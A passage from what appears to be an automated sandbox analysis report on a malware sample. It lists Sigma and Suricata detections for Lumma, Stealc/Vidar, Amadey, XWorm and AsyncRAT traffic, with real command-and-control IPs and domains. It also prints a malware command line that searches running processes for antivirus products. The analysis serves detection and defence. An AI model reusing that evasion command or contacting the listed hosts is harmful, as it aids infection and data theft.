/i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4028, ProcessName: powershell.exe

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6044, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 1988, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:56:59.786620+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	172.67.181.203	443	TCP
2025-02-01T16:57:00.742862+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	172.67.181.203	443	TCP
2025-02-01T16:57:02.686237+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	172.67.181.203	443	TCP
2025-02-01T16:57:04.189834+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	172.67.181.203	443	TCP
2025-02-01T16:57:05.685409+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	172.67.181.203	443	TCP
2025-02-01T16:57:07.329551+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	172.67.181.203	443	TCP
2025-02-01T16:57:09.081999+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	172.67.181.203	443	TCP
2025-02-01T16:57:11.552282+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	172.67.181.203	443	TCP
2025-02-01T16:58:10.284290+0100	2028371	3	Unknown Traffic	192.168.2.5	54713	172.67.149.66	443	TCP
2025-02-01T16:58:11.690271+0100	2028371	3	Unknown Traffic	192.168.2.5	54714	172.67.149.66	443	TCP
2025-02-01T16:58:12.830149+0100	2028371	3	Unknown Traffic	192.168.2.5	54718	172.67.149.66	443	TCP
2025-02-01T16:58:14.227896+0100	2028371	3	Unknown Traffic	192.168.2.5	54721	172.67.149.66	443	TCP
2025-02-01T16:58:15.679907+0100	2028371	3	Unknown Traffic	192.168.2.5	54722	172.67.149.66	443	TCP
2025-02-01T16:58:17.573979+0100	2028371	3	Unknown Traffic	192.168.2.5	54726	172.67.149.66	443	TCP
2025-02-01T16:58:19.134697+0100	2028371	3	Unknown Traffic	192.168.2.5	54728	172.67.149.66	443	TCP
2025-02-01T16:58:23.657669+0100	2028371	3	Unknown Traffic	192.168.2.5	54735	172.67.149.66	443	TCP
2025-02-01T16:58:24.144995+0100	2028371	3	Unknown Traffic	192.168.2.5	54736	104.102.49.254	443	TCP

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:49.925347+0100	2035595	1	Domain Observed Used for C2 Detected	159.100.19.137	7707	192.168.2.5	54903	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:57:00.257915+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	172.67.181.203	443	TCP
2025-02-01T16:57:01.266002+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	172.67.181.203	443	TCP
2025-02-01T16:57:12.047418+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49711	172.67.181.203	443	TCP
2025-02-01T16:58:11.179478+0100	2054653	1	A Network Trojan was detected	192.168.2.5	54713	172.67.149.66	443	TCP
2025-02-01T16:58:12.206367+0100	2054653	1	A Network Trojan was detected	192.168.2.5	54714	172.67.149.66	443	TCP
2025-02-01T16:58:24.155513+0100	2054653	1	A Network Trojan was detected	192.168.2.5	54735	172.67.149.66	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:57:00.257915+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	172.67.181.203	443	TCP
2025-02-01T16:58:11.179478+0100	2049836	1	A Network Trojan was detected	192.168.2.5	54713	172.67.149.66	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:57:01.266002+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	172.67.181.203	443	TCP
2025-02-01T16:58:12.206367+0100	2049812	1	A Network Trojan was detected	192.168.2.5	54714	172.67.149.66	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:10.284290+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54713	172.67.149.66	443	TCP
2025-02-01T16:58:11.690271+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54714	172.67.149.66	443	TCP
2025-02-01T16:58:12.830149+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54718	172.67.149.66	443	TCP
2025-02-01T16:58:14.227896+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54721	172.67.149.66	443	TCP
2025-02-01T16:58:15.679907+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54722	172.67.149.66	443	TCP
2025-02-01T16:58:17.573979+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54726	172.67.149.66	443	TCP
2025-02-01T16:58:19.134697+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54728	172.67.149.66	443	TCP
2025-02-01T16:58:23.657669+0100	2059772	1	Domain Observed Used for C2 Detected	192.168.2.5	54735	172.67.149.66	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:11.977788+0100	2044696	1	A Network Trojan was detected	192.168.2.5	54715	185.215.113.43	80	TCP
2025-02-01T16:58:16.787569+0100	2044696	1	A Network Trojan was detected	192.168.2.5	54724	185.215.113.43	80	TCP
2025-02-01T16:58:22.645197+0100	2044696	1	A Network Trojan was detected	192.168.2.5	54731	185.215.113.43	80	TCP
2025-02-01T16:58:29.126859+0100	2044696	1	A Network Trojan was detected	192.168.2.5	54738	185.215.113.43	80	TCP
2025-02-01T16:58:33.998526+0100	2044696	1	A Network Trojan was detected	192.168.2.5	54742	185.215.113.43	80	TCP
2025-02-01T16:58:47.151324+0100	2044696	1	A Network Trojan was detected	192.168.2.5	54744	185.215.113.43	80	TCP
2025-02-01T16:59:35.533166+0100	2044696	1	A Network Trojan was detected	192.168.2.5	54882	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.307874+0100	2059189	1	Domain Observed Used for C2 Detected	192.168.2.5	51096	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.436839+0100	2059191	1	Domain Observed Used for C2 Detected	192.168.2.5	49566	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (guardeduppe .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:09.729026+0100	2059769	1	Domain Observed Used for C2 Detected	192.168.2.5	58414	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.390435+0100	2059199	1	Domain Observed Used for C2 Detected	192.168.2.5	57127	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.357526+0100	2059201	1	Domain Observed Used for C2 Detected	192.168.2.5	56824	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.374924+0100	2059203	1	Domain Observed Used for C2 Detected	192.168.2.5	61770	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.405947+0100	2059207	1	Domain Observed Used for C2 Detected	192.168.2.5	63280	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.418618+0100	2059209	1	Domain Observed Used for C2 Detected	192.168.2.5	57219	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thebeautylovelytop .top)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:09.711074+0100	2059755	1	Domain Observed Used for C2 Detected	192.168.2.5	64635	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:09.755808+0100	2059771	1	Domain Observed Used for C2 Detected	192.168.2.5	56378	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:23.321866+0100	2059211	1	Domain Observed Used for C2 Detected	192.168.2.5	53600	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:56.609736+0100	2044247	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.5	54753	TCP
2025-02-01T16:59:58.610233+0100	2044247	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.5	54913	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:58.120703+0100	2051831	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.5	54755	TCP
2025-02-01T16:59:59.954773+0100	2051831	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.5	54915	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:56.609144+0100	2049087	1	A Network Trojan was detected	192.168.2.5	54753	116.202.5.153	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:59.600480+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54756	116.202.5.153	443	TCP
2025-02-01T16:59:00.704854+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54758	116.202.5.153	443	TCP
2025-02-01T16:59:09.711187+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54782	116.202.5.153	443	TCP
2025-02-01T16:59:09.947918+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54783	116.202.5.153	443	TCP
2025-02-01T16:59:10.942177+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54785	116.202.5.153	443	TCP
2025-02-01T16:59:13.093084+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54789	116.202.5.153	443	TCP
2025-02-01T16:59:14.859356+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54790	116.202.5.153	443	TCP
2025-02-01T16:59:21.164373+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54808	116.202.5.153	443	TCP
2025-02-01T16:59:21.470802+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54822	116.202.5.153	443	TCP
2025-02-01T16:59:23.240043+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54825	116.202.5.153	443	TCP
2025-02-01T16:59:24.681455+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54840	116.202.5.153	443	TCP
2025-02-01T16:59:25.776537+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54855	116.202.5.153	443	TCP
2025-02-01T16:59:27.966673+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54869	116.202.5.153	443	TCP
2025-02-01T16:59:29.246195+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54873	116.202.5.153	443	TCP
2025-02-01T16:59:34.981093+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54881	116.202.5.153	443	TCP
2025-02-01T16:59:36.836377+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54883	116.202.5.153	443	TCP
2025-02-01T16:59:38.831130+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54885	116.202.5.153	443	TCP
2025-02-01T16:59:40.129160+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54887	116.202.5.153	443	TCP
2025-02-01T16:59:41.074813+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54888	116.202.5.153	443	TCP
2025-02-01T16:59:42.125979+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54892	116.202.5.153	443	TCP
2025-02-01T16:59:43.145751+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54893	116.202.5.153	443	TCP
2025-02-01T16:59:44.132911+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54895	116.202.5.153	443	TCP
2025-02-01T16:59:45.043442+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54897	116.202.5.153	443	TCP
2025-02-01T16:59:46.512933+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54899	116.202.5.153	443	TCP
2025-02-01T17:00:01.294117+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54917	116.202.5.153	443	TCP
2025-02-01T17:00:02.435858+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54918	116.202.5.153	443	TCP
2025-02-01T17:00:16.191160+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54940	116.202.5.153	443	TCP
2025-02-01T17:00:16.462788+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54942	116.202.5.153	443	TCP
2025-02-01T17:00:17.523006+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54943	116.202.5.153	443	TCP
2025-02-01T17:00:18.506623+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54946	116.202.5.153	443	TCP
2025-02-01T17:00:20.395161+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	54947	116.202.5.153	443	TCP
2025-02-01T17:00:50.487296+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	55018	116.202.5.153	443	TCP
2025-02-01T17:00:51.320059+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	55047	116.202.5.153	443	TCP
2025-02-01T17:00:52.656946+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	55067	116.202.5.153	443	TCP
2025-02-01T17:00:53.754574+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	55071	116.202.5.153	443	TCP
2025-02-01T17:00:54.796119+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	55073	116.202.5.153	443	TCP
2025-02-01T17:00:55.976154+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	55076	116.202.5.153	443	TCP
2025-02-01T17:00:58.220752+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	55078	116.202.5.153	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:57:07.936781+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	172.67.181.203	443	TCP
2025-02-01T16:58:18.082143+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	54726	172.67.149.66	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:57:22.670536+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49750	185.215.113.115	80	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:49.925347+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.5	54903	TCP
2025-02-01T16:59:57.936763+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.5	54914	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:05.338232+0100	2856147	1	A Network Trojan was detected	192.168.2.5	54710	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:11.244726+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	54711	TCP
2025-02-01T16:59:34.800621+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	54870	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:08.304131+0100	2803305	3	Unknown Traffic	192.168.2.5	54712	185.215.113.97	80	TCP
2025-02-01T16:58:12.714981+0100	2803305	3	Unknown Traffic	192.168.2.5	54717	185.215.113.97	80	TCP
2025-02-01T16:58:17.543911+0100	2803305	3	Unknown Traffic	192.168.2.5	54725	185.215.113.97	80	TCP
2025-02-01T16:58:23.441550+0100	2803305	3	Unknown Traffic	192.168.2.5	54732	185.215.113.97	80	TCP
2025-02-01T16:58:29.851183+0100	2803305	3	Unknown Traffic	192.168.2.5	54741	185.215.113.97	80	TCP
2025-02-01T16:58:34.982104+0100	2803305	3	Unknown Traffic	192.168.2.5	54743	185.215.113.97	80	TCP
2025-02-01T16:59:28.948087+0100	2803305	3	Unknown Traffic	192.168.2.5	54872	185.215.113.97	80	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:09.947918+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54783	116.202.5.153	443	TCP
2025-02-01T16:59:10.942177+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54785	116.202.5.153	443	TCP
2025-02-01T16:59:13.093084+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54789	116.202.5.153	443	TCP
2025-02-01T16:59:21.470802+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54822	116.202.5.153	443	TCP
2025-02-01T16:59:23.240043+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54825	116.202.5.153	443	TCP
2025-02-01T16:59:24.681455+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54840	116.202.5.153	443	TCP
2025-02-01T16:59:25.776537+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54855	116.202.5.153	443	TCP
2025-02-01T16:59:27.966673+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54869	116.202.5.153	443	TCP
2025-02-01T16:59:29.246195+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54873	116.202.5.153	443	TCP
2025-02-01T17:00:16.462788+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54942	116.202.5.153	443	TCP
2025-02-01T17:00:17.523006+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54943	116.202.5.153	443	TCP
2025-02-01T17:00:18.506623+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	54946	116.202.5.153	443	TCP
2025-02-01T17:00:51.320059+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	55047	116.202.5.153	443	TCP
2025-02-01T17:00:52.656946+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	55067	116.202.5.153	443	TCP
2025-02-01T17:00:53.754574+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	55071	116.202.5.153	443	TCP
2025-02-01T17:00:54.796119+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	55073	116.202.5.153	443	TCP
2025-02-01T17:00:55.976154+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	55076	116.202.5.153	443	TCP
2025-02-01T17:00:58.220752+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	55078	116.202.5.153	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:24.674115+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	54736	104.102.49.254	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:58:53.490065+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.5	54750	116.202.5.153	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:57.919403+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:00:13.078027+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:00:22.046479+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:00:27.775456+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:00:35.835019+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:00:43.552268+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:00:58.881669+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:01:08.432053+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP
2025-02-01T17:01:09.797492+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	54894	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T16:59:53.904002+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.027361+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.137647+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.246028+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.362388+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.479865+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.587517+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.704358+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.823170+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:54.930343+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.041409+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.154623+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.264074+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.376715+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.484587+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.592330+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.718366+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.828761+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:55.935912+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.045189+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.156911+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.264833+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.373521+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.495466+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.608381+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.717112+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.838148+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:56.950497+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.068412+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.184898+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.294959+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.398084+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.524631+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.633646+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.743073+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.854254+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:57.921143+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54894	91.212.166.99	4404	TCP
2025-02-01T16:59:57.964266+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.072292+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.181702+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.290033+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
2025-02-01T16:59:58.399462+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	54908	91.212.166.99	4404	TCP
